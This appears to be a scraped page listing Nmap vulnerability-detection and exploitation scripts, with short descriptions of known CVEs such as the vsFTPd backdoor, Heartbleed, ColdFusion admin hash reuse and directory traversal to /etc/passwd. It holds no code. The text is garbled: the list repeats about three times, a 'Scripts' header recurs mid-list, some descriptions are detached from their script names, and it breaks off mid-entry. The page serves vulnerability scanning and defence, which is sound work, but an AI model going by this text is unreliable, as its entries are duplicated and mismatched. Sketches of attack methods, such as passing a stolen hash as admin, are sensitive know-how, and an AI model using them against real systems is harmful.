Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update

Attempts to perform a dynamic DNS update without authentication.
firewall-bypass

Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie

Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor

Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221

Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301

Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug

Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users

Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal

Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags

Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy

Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf

This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss

It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum

Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login

Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git

Checks for a Git repository found in a website’s document root /.git/<something>) and retrieves as much repo information as possible, including language/framework, remotes, last commit message, and repository description.
http-huawei-hg5xx-vuln

Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln

Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure

Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper

Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check

Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss

Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace

Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln

Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738

Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861

Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192

Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368

Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:

the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.

http-vuln-cve2012-1823

Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156

Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786

Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091

An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704

Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions < 7.32 of Drupal core are known to be affected.http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
http-vuln-cve2015-1427

Scripts
afp-path-vuln

Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos

Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec

Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update

Attempts to perform a dynamic DNS update without authentication.
firewall-bypass

Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie

Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor

Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221

Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301

Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug

Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users

Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal

Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags

Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy

Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf

This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss

It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum

Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login

Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git

Checks for a Git repository found in a website’s document root /.git/<something>) and retrieves as much repo information as possible, including language/framework, remotes, last commit message, and repository description.
http-huawei-hg5xx-vuln

Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln

Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure

Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper

Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check

Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss

Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace

Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln

Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738

Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861

Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192

Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368

Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:

the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.

http-vuln-cve2012-1823

Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156

Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786

Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091

An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129

Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704

Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions < 7.32 of Drupal core are known to be affected.http-vuln-cve2014-8877

Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions <= 2.0.0 are known to be affected.
http-vuln-cve2015-1427

This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020

Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass

Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader

Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182

Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker

Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103

Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025

Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029

Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067

Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054

Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061

Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos

Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344

Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720

Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764

Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection

Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr

Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params

Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed

Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford (jspenguin@jspenguin.org)
ssl-known-key

Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle

Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown

Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed

Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version

Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635

Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638

Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie

Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds

A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users

Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero

IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels

Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor

Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122

netbus-auth-bypass

Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec

Scripts
afp-path-vuln

Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos

Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec

Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687

Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update

Attempts to perform a dynamic DNS update without authentication.
firewall-bypass

Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie

Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor

Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor

Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221

Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301

Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug

Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users

Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec

Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal

Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags

Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy

Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf

This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor

Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss

It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum

Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter

Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login

Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git

Checks for a Git repository found in a website’s document root /.git/<something>) and retrieves as much repo information as possible, including language/framework, remotes, last commit message, and repository description.
http-huawei-hg5xx-vuln

Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln

Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure

Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download

Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal

Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper

Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd

Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss

Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock

Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check

Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection

Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss

Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal

Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace

Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln

Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392

Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738

Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861

Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192

Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368

Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:

the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.

http-vuln-cve2012-1823

Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156

Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786

Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091

An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126

